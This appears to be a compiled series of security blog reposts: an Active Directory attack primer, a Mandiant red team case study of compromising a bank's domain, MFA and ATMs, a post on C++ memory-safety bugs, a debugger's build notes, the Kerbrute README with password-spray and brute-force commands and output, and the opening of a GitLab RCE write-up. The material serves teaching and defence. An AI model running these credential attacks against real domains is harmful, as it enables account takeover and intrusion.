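    Note that the client never sees the krbtgt key or the service key; it only ever holds its own key and the session key, which is exactly why stealing those long-term keys (Golden and Silver Tickets, below) is so powerful.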

    Attacks on Kerberos:

    Silver Tickets are forged Ticket Granting Service (TGS) tickets. Because a TGS ticket is encrypted with the service account's password hash, that hash can be cracked offline and then used to forge tickets that compromise the service machine.

    Golden Tickets are forged Ticket Granting Tickets (TGT), normally obtained from the KDC in the AS_REP. An attacker who obtains the krbtgt account's hash can forge TGTs for any user, effectively compromising the KDC.

    AS-REP Roasting can be performed when an account has pre-authentication disabled (the DONT_REQ_PREAUTH flag is set): an attacker can request an AS_REP from the KDC on behalf of that account and crack the password offline.

    LDAP is the Lightweight Directory Access Protocol, a communication protocol that defines the methods for accessing directory services in a domain. It defines the way data is presented to users and includes components such as attributes, entries, and the Directory Information Tree.

    Reconnaissance:

    • SPN Scanning instead of Port Scanning of all the machines

    Active Directory can be enumerated in multiple ways as follows:

    • Active Directory can be enumerated even without a domain account
    • Active Directory can be enumerated to gather all domain and forest information, forest and domain trusts, and much more, without admin rights
    • Active Directory can be enumerated to retrieve privileged accounts and the access rights of all groups using PowerView

    Attacks on AD

    • Pass-the-Hash: a technique in which the NTLM hash of an account is passed to a remote server to log in, instead of the plaintext password
    • Pass-the-Cache: passing the cached credentials of Linux/Unix-based systems that are part of the domain to a Windows-based machine to gain access to it
    • Over-Pass-the-Hash: an obtained NTLM hash is passed to the KDC to obtain a valid Kerberos ticket, which is then passed to another system to gain access
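    The reason Pass-the-Hash works is that NTLM challenge-response only proves knowledge of the password *hash*, never the plaintext. The toy model below shows this: all names are hypothetical, and SHA-256/HMAC stands in for the real MD4-based NT hash and NTLMv2 response, but the structural point is the same -- an attacker holding only the hash computes the same proof a legitimate client would.

```python
import hashlib
import hmac
import os

def nt_hash(password: str) -> bytes:
    # Stand-in: the real NT hash is MD4(UTF-16LE(password)).
    return hashlib.sha256(password.encode("utf-16-le")).digest()

def challenge_response(secret_hash: bytes, challenge: bytes) -> bytes:
    # Toy challenge-response: keyed on the hash, not on the plaintext password.
    return hmac.new(secret_hash, challenge, hashlib.sha256).digest()

stored = nt_hash("Password123")          # what the server/DC has on file
challenge = os.urandom(16)               # server's random challenge

# A legitimate client derives the hash from the typed password...
legit = challenge_response(nt_hash("Password123"), challenge)
# ...but a stolen hash alone, with no plaintext, yields the identical proof:
attacker = challenge_response(stored, challenge)

print(hmac.compare_digest(legit, attacker))  # True
```

    Since the plaintext never enters the computation, dumping a hash from LSASS is as good as knowing the password for any protocol that authenticates this way.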

    Maintaining Access in the Domain:

    • DCSync: requires Domain Admin or Enterprise Admin permissions; the attacker impersonates a domain controller's replication requests to pull all password data, allowing them to persist in the domain
    • DCShadow: allows the attacker to register a rogue domain controller and push new objects into the targeted infrastructure

    Many more attacks can be performed to compromise objects in an enterprise Active Directory infrastructure; I have listed the most commonly performed ones. This article covered the basics of Active Directory and the conventions that are necessary to learn before moving on to pen testing. In the next article, I will explain these attacks in detail with practical scenarios.

    Image Ref: https://redmondmag.com/articles/2012/02/01/~/media/ECG/redmondmag/Images/2012/02/0212red_Kerberos_Fig1.ashx

     

    Source: http://blog.securelayer7.net/exploring-exploiting-active-directory-pen-test/

  17. Finding Weaknesses Before the Attackers Do

    This blog post originally appeared as an article in M-Trends 2019.

    FireEye Mandiant red team consultants perform objectives-based assessments that emulate real cyber attacks by advanced and nation state attackers across the entire attack lifecycle by blending into environments and observing how employees interact with their workstations and applications. Assessments like this help organizations identify weaknesses in their current detection and response procedures so they can update their existing security programs to better deal with modern threats.

    A financial services firm engaged a Mandiant red team to evaluate the effectiveness of its information security team’s detection, prevention and response capabilities. The key objectives of this engagement were to accomplish the following actions without detection:

    • Compromise Active Directory (AD): Gain domain administrator privileges within the client’s Microsoft Windows AD environment.
    • Access financial applications: Gain access to applications and servers containing financial transfer data and account management functionality.
    • Bypass RSA Multi-Factor Authentication (MFA): Bypass MFA to access sensitive applications, such as the client’s payment management system.
    • Access ATM environment: Identify and access ATMs in a segmented portion of the internal network.

    Initial Compromise

    Based on Mandiant’s investigative experience, social engineering has become the most common and efficient initial attack vector used by advanced attackers. For this engagement, the red team used a phone-based social engineering scenario to circumvent email detection capabilities and avoid the residual evidence that is often left behind by a phishing email.

    While performing Open-source intelligence (OSINT) reconnaissance of the client’s Internet-facing infrastructure, the red team discovered an Outlook Web App login portal hosted at https://owa.customer.example. The red team registered a look-alike domain (https://owacustomer.example) and cloned the client’s login portal (Figure 1).

    Fig1.png
    Figure 1: Cloned Outlook Web Portal

    After the OWA portal was cloned, the red team identified IT helpdesk and employee phone numbers through further OSINT. Once these phone numbers were gathered, the red team used a publicly available online service to call the employees while spoofing the phone number of the IT helpdesk.

    Mandiant consultants posed as helpdesk technicians and informed employees that their email inboxes had been migrated to a new company server. To complete the “migration,” the employee would have to log into the cloned OWA portal. To avoid suspicion, employees were immediately redirected to the legitimate OWA portal once they authenticated. Using this campaign, the red team captured credentials from eight employees which could be used to establish a foothold in the client’s internal network.

    Establishing a Foothold

    Although the client’s virtual private network (VPN) and Citrix web portals implemented MFA that required users to provide a password and RSA token code, the red team found a singlefactor bring-your-own-device (BYOD) portal (Figure 2).

    Fig2.png
    Figure 2: Single factor mobile device management portal

    Using stolen domain credentials, the red team logged into the BYOD web portal to attempt enrollment of an Android phone for CUSTOMER\user0. While the red team could view user settings, they were unable to add a new device. To bypass this restriction, the consultants downloaded the IBM MaaS360 Android app and logged in via their phone. The device configuration process installed the client's VPN certificate (Figure 3), which was automatically imported to the Cisco AnyConnect app—also installed on the phone.

    Fig3.png
    Figure 3: Setting up mobile device management

    After launching the AnyConnect app, the red team confirmed the phone received an IP address on the client’s VPN. Using a generic tethering app from the Google Play store, the red team then tethered a laptop to the phone to access the client’s internal network.

    Escalating Privileges

    Once connected to the internal network, the red team used the Windows "runas" command to launch PowerShell as CUSTOMER\user0 and perform a "Kerberoast" attack. Kerberoasting abuses legitimate features of Active Directory to retrieve service accounts' ticket-granting service (TGS) tickets and brute-force accounts with weak passwords.

    To perform the attack, the red team queried an Active Directory domain controller for all accounts with a service principal name (SPN). The typical Kerberoast attack would then request a TGS for the SPN of the associated user account. While Kerberos ticket requests are common, the default Kerberoast attack tool generates an increased volume of requests, which is anomalous and could be identified as suspicious. Using a keyword search for terms such as “Admin”, “SVC” and “SQL,” the consultants identified 18 potentially high-value accounts. To avoid detection, the red team retrieved tickets for this targeted subset of accounts and inserted random delays between each request. The Kerberos tickets for these accounts were then uploaded to a Mandiant password-cracking server which successfully brute-forced the passwords of 4 out of 18 accounts within 2.5 hours.
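    The offline half of the attack is what makes it safe for the attacker: because each TGS ticket is encrypted with the service account's key, cracking means deriving a key from each wordlist candidate and trying it against the captured blob, with no further traffic to the domain controller. A minimal sketch, with a toy XOR cipher standing in for RC4-HMAC and entirely hypothetical names and passwords:

```python
import hashlib
import json

def derive_key(password: str) -> bytes:
    # Stand-in for the RC4/AES key derived from the service account's password.
    return hashlib.sha256(password.encode()).digest()

def xor_cipher(key: bytes, data: bytes) -> bytes:
    # Toy symmetric cipher for illustration only.
    stream = (hashlib.sha256(key).digest() * (len(data) // 32 + 1))[:len(data)]
    return bytes(a ^ b for a, b in zip(data, stream))

# A "captured" service ticket: in reality the encrypted part of a KRB-TGS-REP.
ticket = xor_cipher(derive_key("Summer2019!"),
                    json.dumps({"spn": "MSSQLSvc/db01.lab.local"}).encode())

def crack(blob: bytes, wordlist):
    # Fully offline: no lockouts, no 4625 events, limited only by local compute.
    for candidate in wordlist:
        try:
            json.loads(xor_cipher(derive_key(candidate), blob))
            return candidate                 # plaintext parsed -> password found
        except ValueError:                   # wrong key -> garbage fails to parse
            continue
    return None

print(crack(ticket, ["password1", "Winter2018", "Summer2019!"]))
```

    Real tooling validates candidates against the ticket's HMAC checksum rather than by parsing plaintext, but the economics are the same: once the ticket leaves the wire, the only defense is the strength of the service account's password.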

    The red team then compiled a list of Active Directory group memberships for the cracked accounts, uncovering several groups that followed the naming scheme of {ComputerName}_Administrators. The red team confirmed the accounts possessed local administrator privileges to the specified computers by performing a remote directory listing of \\{ComputerName}\C$. The red team also executed commands on the system using PowerShell Remoting to gain information about logged on users and running software. After reviewing this data, the red team identified an endpoint detection and response (EDR) agent which had the capability to perform in-memory detections that were likely to identify and alert on the execution of suspicious command line arguments and parent/child process heuristics associated with credential theft.

    To avoid detection, the red team created LSASS process memory dumps by using a custom utility executed via WMI. The red team retrieved the LSASS dump files over SMB and extracted cleartext passwords and NTLM hashes using Mimikatz. The red team performed this process on 10 unique systems identified to potentially have active privileged user sessions. From one of these 10 systems, the red team successfully obtained credentials for a member of the Domain Administrators group.

    With access to this Domain Administrator account, the red team gained full administrative rights for all systems and users in the customer’s domain. This privileged account was then used to focus on accessing several high-priority applications and network segments to demonstrate the risk of such an attack on critical customer assets.

    Accessing High-Value Objectives

    For this phase, the client identified their RSA MFA systems, ATM network and high-value financial applications as three critical objectives for the Mandiant red team to target.

    Targeting Financial Applications

    The red team began this phase by querying Active Directory data for hostnames related to the objectives and found multiple servers and databases that included references to their key financial application. The red team reviewed the files and documentation on financial application web servers and found an authentication log indicating the following users accessed the financial application:

    • CUSTOMER\user1
    • CUSTOMER\user2
    • CUSTOMER\user3
    • CUSTOMER\user4

    The red team navigated to the financial application’s web interface (Figure 4) and found that authentication required an “RSA passcode,” clearly indicating access required an MFA token.

    Fig4.png
    Figure 4: Financial application login portal

    Bypassing Multi-Factor Authentication

    The red team targeted the client’s RSA MFA implementation by searching network file shares for configuration files and IT documentation. In one file share (Figure 5), the red team discovered software migration log files that revealed the hostnames of three RSA servers.

    Fig5.png
    Figure 5: RSA migration logs from \\CUSTOMER-FS01\Software

    Next, the red team focused on identifying the user who installed the RSA authentication module. The red team performed a directory listing of the C:\Users and C:\data folders of the RSA servers, finding CUSTOMER\CUSTOMER_ADMIN10 had logged in the same day the RSA agent installer was downloaded. Using these indicators, the red team targeted CUSTOMER\CUSTOMER_ADMIN10 as a potential RSA administrator.

    Fig6.png
    Figure 6: Directory listing output

    By reviewing user details, the red team identified the CUSTOMER\CUSTOMER_ADMIN10 account was actually the privileged account for the corresponding standard user account CUSTOMER\user103. The red team then used PowerView, an open source PowerShell tool, to identify systems in the environment where CUSTOMER\user103 was or had recently logged in (Figure 7).

    Fig7.png
    Figure 7: Running the PowerView Invoke-UserHunter command

    The red team harvested credentials from the LSASS memory of 10.1.33.133 and successfully obtained the cleartext password for CUSTOMER\user103 (Figure 8).

    Fig8.png
    Figure 8: Mimikatz output

    The red team used the credential for CUSTOMER\user103 to log in, without MFA, to the web front-end of the RSA security console with administrative rights (Figure 9).

    Fig9.png
    Figure 9: RSA console

    Many organizations have audit procedures to monitor for the creation of new RSA tokens, so the red team decided the stealthiest approach would be to provision an emergency tokencode. However, since the client was using software tokens, the emergency tokens still required a user’s RSA SecurID PIN. The red team decided to target individual users of the financial application and attempt to discover an RSA PIN stored on their workstation.

    While the red team knew which users could access the financial application, they did not know the system assigned to each user. To identify these systems, the red team targeted the users through their inboxes. The red team set a malicious Outlook homepage for the financial application user CUSTOMER\user1 through MAPI over HTTP using the Ruler utility. This ensured that whenever the user reopened Outlook on their system, a backdoor would launch.

    Once CUSTOMER\user1 had re-launched Outlook and their workstation was compromised, the red team began enumerating installed programs on the system and identified that the target user used KeePass, a common password vaulting solution.

    The red team performed an attack against KeePass to retrieve the contents of the file without having the master password by adding a malicious event trigger to the KeePass configuration file (Figure 10). With this trigger, the next time the user opened KeePass a comma-separated values (CSV) file was created with all passwords in the KeePass database, and the red team was able to retrieve the export from the user’s roaming profile.

    Fig10.png
    Figure 10: Malicious configuration file

    One of the entries in the resulting CSV file was login credentials for the financial application, which included not only the application password, but also the user’s RSA SecurID PIN. With this information the red team possessed all the credentials needed to access the financial application.

    The red team logged into the RSA Security Console as CUSTOMER\user103 and navigated to the user record for CUSTOMER\user1. The red team then generated an online emergency access token (Figure 11). The token was configured so that the next time CUSTOMER\user1 authenticated with their legitimate RSA SecurID PIN + tokencode, the emergency access code would be disabled. This was done to remain covert and mitigate any impact to the user's ability to conduct business.

    Fig11.png
    Figure 11: Emergency access token

    The red team then successfully authenticated to the financial application with the emergency access token (Figure 12).

    Fig12.png
    Figure 12: Financial application accessed with emergency access token

    Accessing ATMs

    The red team’s final objective was to access the ATM environment, located on a separate network segment from the primary corporate domain. First, the red team prepared a list of high-value users by querying the member list of potentially relevant groups such as ATM_ Administrators. The red team then searched all accessible systems for recent logins by these targeted accounts and dumped their passwords from memory.

    After obtaining a password for ATM administrator CUSTOMER\ADMIN02, the red team logged into the client’s internal Citrix portal to access the employee’s desktop. The red team reviewed the administrator’s documentation and determined the client’s ATMs could be accessed through a server named JUMPHOST01, which connected the corporate and ATM network segments. The red team also found a bookmark saved in Internet Explorer for “ATM Management.” While this link could not be accessed directly from the Citrix desktop, the red team determined it would likely be accessible from JUMPHOST01.

    The jump server enforced MFA for users attempting to RDP into the system, so the red team used a previously compromised domain administrator account, CUSTOMER\ADMIN01, to execute a payload on JUMPHOST01 through WMI. WMI does not support MFA, so the red team was able to establish a connection between JUMPHOST01 and the red team's CnC server, create a SOCKS proxy, and access the ATM Management application without an RSA PIN. The red team successfully authenticated to the ATM Management application and could then dispense money, add local administrators, install new software and execute commands with SYSTEM privileges on all ATM machines (Figure 13).

    Fig13.png
    Figure 13: Executing commands on ATMs as SYSTEM

    Takeaways: Multi-Factor Authentication, Password Policy and Account Segmentation

    Multi-Factor Authentication

    Mandiant experts have seen a significant uptick in the number of clients securing their VPN or remote access infrastructure with MFA. However, there is frequently a lack of MFA for applications being accessed from within the internal corporate network. Therefore, FireEye recommends that customers enforce MFA for all externally accessible login portals and for any sensitive internal applications.

    Password Policy

    During this engagement, the red team compromised four privileged service accounts due to the use of weak passwords which could be quickly brute-forced. FireEye recommends that customers enforce strong password practices for all accounts. Customers should enforce a minimum of 20-character passwords for service accounts. When possible, customers should also use Microsoft Managed Service Accounts (MSAs) or enterprise password vaulting solutions to manage privileged users.
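    To see why 20 characters matters, compare the keyspace an offline Kerberoast crack must cover. For randomly chosen passwords drawn from the 95 printable ASCII characters, entropy grows linearly with length:

```python
import math

CHARSET = 95  # printable ASCII characters

for length in (8, 12, 20):
    bits = length * math.log2(CHARSET)
    print(f"{length:2d} chars: ~{bits:.0f} bits of entropy")
```

    Roughly 53 bits (8 random characters) is within reach of a dedicated cracking rig in months, while ~131 bits (20 characters) is far beyond any feasible offline attack. Real service account passwords are rarely random, of course, which is why the four weak ones in this engagement fell in 2.5 hours; length plus randomness, or a managed account with machine-generated secrets, closes that gap.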

    Account Segmentation

    Once the red team obtained initial access to the environment, they were able to escalate privileges in the domain quickly due to a lack of account segmentation. FireEye recommends customers follow the “principle of least-privilege” when provisioning accounts. Accounts should be separated by role so normal users, administrative users and domain administrators are all unique accounts even if a single employee needs one of each. 

    Normal user accounts should not be given local administrator access without a documented business requirement. Workstation administrators should not be allowed to log in to servers and vice versa. Finally, domain administrators should only be permitted to log in to domain controllers, and server administrators should not have access to those systems. By segmenting accounts in this way, customers can greatly increase the difficulty of an attacker escalating privileges or moving laterally from a single compromised account.

    Conclusion

    As demonstrated in this case study, the Mandiant red team was able to gain a foothold in the client’s environment, obtain full administrative control of the company domain and compromise all critical business applications without any software or operating system exploits. Instead, the red team focused on identifying system misconfigurations, conducting social engineering attacks and using the client’s internal tools and documentation. The red team was able to achieve their objectives due to the configuration of the client’s MFA, service account password policy and account segmentation.

     

    Source: https://www.fireeye.com/blog/threat-research/2019/04/finding-weaknesses-before-the-attackers-do.html

  18. Modern C++ Won't Save Us

    2019-04-21 by alex_gaynor

    I'm a frequent critic of memory unsafe languages, principally C and C++, and how they induce an exceptional number of security vulnerabilities. My conclusion, based on reviewing evidence from numerous large software projects using C and C++, is that we need to be migrating our industry to memory safe by default languages (such as Rust and Swift). One of the responses I frequently receive is that the problem isn't C and C++ themselves, developers are simply holding them wrong. In particular, I often receive defenses of C++ of the form, "C++ is safe if you don't use any of the functionality inherited from C"1 or similarly that if you use modern C++ types and idioms you will be immune from the memory corruption vulnerabilities that plague other projects.

    I would like to credit C++'s smart pointer types, because they do significantly help. Unfortunately, my experience working on large C++ projects which use modern idioms is that these are not nearly sufficient to stop the flood of vulnerabilities. My goal for the remainder of this post is to highlight a number of completely modern C++ idioms which produce vulnerabilities.

    Hide the reference use-after-free

    The first example I'd like to describe, originally from Kostya Serebryany, is how C++'s std::string_view can make it easy to hide use-after-free vulnerabilities:

    #include <iostream>
    #include <string>
    #include <string_view>
    
    int main() {
      std::string s = "Hellooooooooooooooo ";
      std::string_view sv = s + "World\n";
      std::cout << sv;
    }
    

    What's happening here is that s + "World\n" allocates a new std::string, and then is converted to a std::string_view. At this point the temporary std::string is freed, but sv still points at the memory that used to be owned by it. Any future use of sv is a use-after-free vulnerability. Oops! C++ lacks the facilities for the compiler to be aware that sv captures a reference to something where the reference lives longer than the referent. The same issue impacts std::span, also an extremely modern C++ type.

    Another fun variant involves using C++'s lambda support to hide a reference:

    #include <memory>
    #include <iostream>
    #include <functional>
    
    
    std::function<int(void)> f(std::shared_ptr<int> x) {
        return [&]() { return *x; };
    }
    
    int main() {
        std::function<int(void)> y(nullptr);
        {
            std::shared_ptr<int> x(std::make_shared<int>(4));
            y = f(x);
        }
        std::cout << y() << std::endl;
    }
    

    Here the [&] in f causes the lambda to capture values by reference. Then in main x goes out of scope, destroying the last reference to the data, and causing it to be freed. At this point y contains a dangling pointer. This occurs despite our meticulous use of smart pointers throughout. And yes, people really do write code that handles std::shared_ptr<T>&, often as an attempt to avoid additional increment and decrements on the reference count.

    std::optional<T> dereference

    std::optional represents a value that may or may not be present, often replacing magic sentinel values (such as -1 or nullptr). It offers methods such as value(), which extract the T it contains and raise an exception if the optional is empty. However, it also defines operator* and operator->. These methods also provide access to the underlying T, but they do not check whether the optional actually contains a value.

    The following code for example, simply returns an uninitialized value:

    #include <optional>
    
    int f() {
        std::optional<int> x(std::nullopt);
        return *x;
    }
    

    If you use std::optional as a replacement for nullptr this can produce even more serious issues! Dereferencing a nullptr gives a segfault (which is not a security issue, except in older kernels). Dereferencing a nullopt however, gives you an uninitialized value as a pointer, which can be a serious security issue. While having a T* with an uninitialized value is also possible, these are much less common than dereferencing a pointer that was correctly initialized to nullptr.

    And no, this doesn't require you to be using raw pointers. You can get uninitialized/wild pointers with smart pointers as well:

    #include <optional>
    #include <memory>
    
    std::unique_ptr<int> f() {
        std::optional<std::unique_ptr<int>> x(std::nullopt);
        return std::move(*x);
    }
    

    std::span<T> indexing

    std::span<T> provides an ergonomic way to pass around a reference to a contiguous slice of memory and a length. This lets you easily write code that works over multiple different types; a std::span<uint8_t> can point to memory owned by a std::vector<uint8_t>, a std::array<uint8_t, N>, or even a raw pointer. Failure to correctly check bounds is a frequent source of security vulnerabilities, and in many senses span helps out with this by ensuring you always have a length handy.

    Like all STL data structures, span's operator[] method does not perform any bounds checks. This is regrettable, since operator[] is the most ergonomic and default way people use data structures. std::vector and std::array can at least theoretically be used safely because they offer an at() method which is bounds checked (in practice I've never seen this done, but you could imagine a project adopting a static analysis tool which simply banned calls to std::vector<T>::operator[]). span does not offer an at() method, or any other method which performs a bounds checked lookup.

    Interestingly, both Firefox and Chromium's backports of std::span do perform bounds checks in operator[], and thus they'll never be able to safely migrate to std::span.

    Conclusion

    Modern C++ idioms introduce many changes which have the potential to improve security: smart pointers better express expected lifetimes, std::span ensures you always have a correct length handy, std::variant provides a safer abstraction for unions. However modern C++ also introduces some incredible new sources of vulnerabilities: lambda capture use-after-free, uninitialized-value optionals, and un-bounds-checked span.

    My professional experience writing relatively modern C++, and auditing Rust code (including Rust code that makes significant use of unsafe) is that the safety of modern C++ is simply no match for memory safe by default languages like Rust and Swift (or Python and Javascript, though I find it rare in life to have a program that makes sense to write in either Python or C++).

    There are significant challenges to migrating existing, large, C and C++ codebases to a different language -- no one can deny this. Nonetheless, the question simply must be how we can accomplish it, rather than if we should try. Even with the most modern C++ idioms available, the evidence is clear that, at scale, it's simply not possible to hold C++ right.

    [1] I understood this to be referring to raw pointers, arrays-as-pointers, manual malloc/free, and other similar features. However I think it's worth acknowledging that given that C++ explicitly incorporated C into its specification, in practice most C++ code incorporates some of these elements.

    about.jpg

    Hi, I'm Alex. I'm currently at a startup called Alloy. Before that I was an engineer working on Firefox security and before that at the U.S. Digital Service. I'm an avid open source contributor and live in Washington, DC.

     

     

     

     

    Source: https://alexgaynor.net/2019/apr/21/modern-c++-wont-save-us/

  19. Debugger for .NET Core runtime

    The debugger implements the GDB/MI and VSCode Debug Adapter protocols and allows you to debug .NET apps under the .NET Core runtime.

    Build

    Switch to the netcoredbg directory, create a build directory and switch into it:

    mkdir build
    cd build
    

    Proceed to build with cmake.

    Necessary dependencies (CoreCLR sources and .NET SDK binaries) are going to be downloaded during CMake configure step. It is possible to override them with CMake options -DCORECLR_DIR=<path-to-coreclr> and -DDOTNET_DIR=<path-to-dotnet-sdk>.

    Ubuntu

    CC=clang CXX=clang++ cmake .. -DCMAKE_INSTALL_PREFIX=$PWD/../bin
    

    macOS

    cmake .. -DCMAKE_INSTALL_PREFIX=$PWD/../bin
    

    Windows

    cmake .. -G "Visual Studio 15 2017 Win64" -DCMAKE_INSTALL_PREFIX="$pwd\..\bin"
    

    Compile and install:

    cmake --build . --target install
    

    Run

    The above commands create bin directory with netcoredbg binary and additional libraries.

    Now running the debugger with --help option should look like this:

    $ ../bin/netcoredbg --help
    .NET Core debugger
    
    Options:
    --attach <process-id>                 Attach the debugger to the specified process id.
    --interpreter=mi                      Puts the debugger into MI mode.
    --interpreter=vscode                  Puts the debugger into VS Code Debugger mode.
    --engineLogging[=<path to log file>]  Enable logging to VsDbg-UI or file for the engine.
                                          Only supported by the VsCode interpreter.
    --server[=port_num]                   Start the debugger listening for requests on the
                                          specified TCP/IP port instead of stdin/out. If port is not specified
                                          TCP 4711 will be used.
    

     

    Sursa: https://github.com/Samsung/netcoredbg

  20. Kerbrute

    A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication

    Grab the latest binaries from the releases page to get started.

    Background

    This tool grew out of some bash scripts I wrote a few years ago to perform bruteforcing using the Heimdal Kerberos client from Linux. I wanted something that didn't require privileges to install a Kerberos client, and when I found the amazing pure Go implementation of Kerberos gokrb5, I decided to finally learn Go and write this.

    Bruteforcing Windows passwords with Kerberos is much faster than any other approach I know of, and potentially stealthier since pre-authentication failures do not trigger that "traditional" An account failed to log on event 4625. With Kerberos, you can validate a username or test a login by only sending one UDP frame to the KDC (Domain Controller).

    For more background and information, check out my Troopers 2019 talk, Fun with LDAP and Kerberos (link TBD)

    Usage

    Kerbrute has three main commands:

    • bruteuser - Bruteforce a single user's password from a wordlist
    • passwordspray - Test a single password against a list of users
    • userenum - Enumerate valid domain usernames via Kerberos

    A domain (-d) or a domain controller (--dc) must be specified. If a Domain Controller is not given the KDC will be looked up via DNS.

    By default, Kerbrute is multithreaded and uses 10 threads. This can be changed with the -t option.

    Output is logged to stdout, but a log file can be specified with -o.

    By default, failures are not logged, but that can be changed with -v.

    Lastly, Kerbrute has a --safe option. When this option is enabled, if an account comes back as locked out, it will abort all threads to stop locking out any other accounts.

    The help command can be used for more information

    $ ./kerbrute
    
        __             __               __
       / /_____  _____/ /_  _______  __/ /____
      / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
     / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
    /_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
    
    Version: v1.0.0 (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop
    
    This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
    It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
    Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts
    
    Usage:
      kerbrute [command]
    
    Available Commands:
      bruteuser     Bruteforce a single user's password from a wordlist
      help          Help about any command
      passwordspray Test a single password against a list of users
      userenum      Enumerate valid domain usernames via Kerberos
      version       Display version info and quit
    
    Flags:
          --dc string       The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
      -d, --domain string   The full domain to use (e.g. contoso.com)
      -h, --help            help for kerbrute
      -o, --output string   File to write logs to. Optional.
          --safe            Safe mode. Will abort if any user comes back as locked out. Default: FALSE
      -t, --threads int     Threads to use (default 10)
      -v, --verbose         Log failures and errors
    
    Use "kerbrute [command] --help" for more information about a command.
    

    User Enumeration

    To enumerate usernames, Kerbrute sends TGT requests with no pre-authentication. If the KDC responds with a PRINCIPAL UNKNOWN error, the username does not exist. However, if the KDC prompts for pre-authentication, we know the username exists and we move on. This does not cause any login failures so it will not lock out any accounts. This generates a Windows event ID 4768 if Kerberos logging is enabled.
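    The decision logic described above boils down to mapping the KDC's error codes. A hypothetical sketch in Python (this is not Kerbrute's actual Go code; the error numbers are the standard Kerberos V5 codes from RFC 4120):

    ```python
    # Hypothetical sketch of the enumeration decision, not Kerbrute's actual code.
    # Error codes are the standard Kerberos V5 values (RFC 4120).
    KDC_ERR_C_PRINCIPAL_UNKNOWN = 6   # client principal unknown: username invalid
    KDC_ERR_PREAUTH_REQUIRED = 25     # KDC demands pre-auth: username exists

    def classify_username(kdc_error):
        """Decide whether a username exists from the KDC's error response."""
        if kdc_error == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            return "invalid"
        if kdc_error == KDC_ERR_PREAUTH_REQUIRED:
            return "valid"
        return "inconclusive"

    print(classify_username(25))  # a pre-auth prompt means the user exists
    ```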

    root@kali:~# ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
    
        __             __               __
       / /_____  _____/ /_  _______  __/ /____
      / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
     / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
    /_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
    
    Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop
    
    2019/03/06 21:28:04 >  Using KDC(s):
    2019/03/06 21:28:04 >   pdc01.lab.ropnop.com:88
    
    2019/03/06 21:28:04 >  [+] VALID USERNAME:       amata@lab.ropnop.com
    2019/03/06 21:28:04 >  [+] VALID USERNAME:       thoffman@lab.ropnop.com
    2019/03/06 21:28:04 >  Done! Tested 1001 usernames (2 valid) in 0.425 seconds
    

    Password Spray

    With passwordspray, Kerbrute will perform a horizontal brute force attack against a list of domain users. This is useful for testing one or two common passwords when you have a large list of users. WARNING: this will increment the failed login count and lock out accounts. This will generate both event IDs 4768 - A Kerberos authentication ticket (TGT) was requested and 4771 - Kerberos pre-authentication failed

    root@kali:~# ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
    
        __             __               __
       / /_____  _____/ /_  _______  __/ /____
      / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
     / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
    /_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
    
    Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop
    
    2019/03/06 21:37:29 >  Using KDC(s):
    2019/03/06 21:37:29 >   pdc01.lab.ropnop.com:88
    
    2019/03/06 21:37:35 >  [+] VALID LOGIN:  callen@lab.ropnop.com:Password123
    2019/03/06 21:37:37 >  [+] VALID LOGIN:  eshort@lab.ropnop.com:Password123
    2019/03/06 21:37:37 >  Done! Tested 2755 logins (2 successes) in 7.674 seconds
    

    Brute User

    This is a traditional bruteforce account against a username. Only run this if you are sure there is no lockout policy! This will generate both event IDs 4768 - A Kerberos authentication ticket (TGT) was requested and 4771 - Kerberos pre-authentication failed

    root@kali:~# ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman
    
        __             __               __
       / /_____  _____/ /_  _______  __/ /____
      / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
     / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
    /_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
    
    Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop
    
    2019/03/06 21:38:24 >  Using KDC(s):
    2019/03/06 21:38:24 >   pdc01.lab.ropnop.com:88
    
    2019/03/06 21:38:27 >  [+] VALID LOGIN:  thoffman@lab.ropnop.com:Summer2017
    2019/03/06 21:38:27 >  Done! Tested 1001 logins (1 successes) in 2.711 seconds
    

    Installing

    You can download pre-compiled binaries for Linux, Windows and Mac from the releases page. If you want to live on the edge, you can also install with Go:

    $ go get github.com/ropnop/kerbrute
    

    With the repository cloned, you can also use the Make file to compile for common architectures:

    $ make help
    help:            Show this help.
    windows:  Make Windows x86 and x64 Binaries
    linux:  Make Linux x86 and x64 Binaries
    mac:  Make Darwin (Mac) x86 and x64 Binaries
    clean:  Delete any binaries
    all:  Make Windows, Linux and Mac x86/x64 Binaries
    
    $ make all
    Done.
    Building for windows amd64..
    Building for windows 386..
    Done.
    Building for linux amd64...
    Building for linux 386...
    Done.
    Building for mac amd64...
    Building for mac 386...
    Done.
    
    $ ls dist/
    kerbrute_darwin_386        kerbrute_linux_386         kerbrute_windows_386.exe
    kerbrute_darwin_amd64      kerbrute_linux_amd64       kerbrute_windows_amd64.exe
    

    Credits

    Huge shoutout to jcmturner for his pure Go implementation of KRB5: https://github.com/jcmturner/gokrb5 . An amazing project and very well documented. Couldn't have done any of this without that project.

     

    Sursa: https://github.com/ropnop/kerbrute

  21. GitLab 11.4.7 Remote Code Execution

    21 Apr 2019

    TL;DR

    SSRF targeting redis for RCE via IPv6/IPv4 address embedding chained with CRLF injection in the git:// protocol.

    Video

    watch on YouTube

    Introduction

    At the Real World CTF, we came across an interesting web challenge called flaglab. The description said:

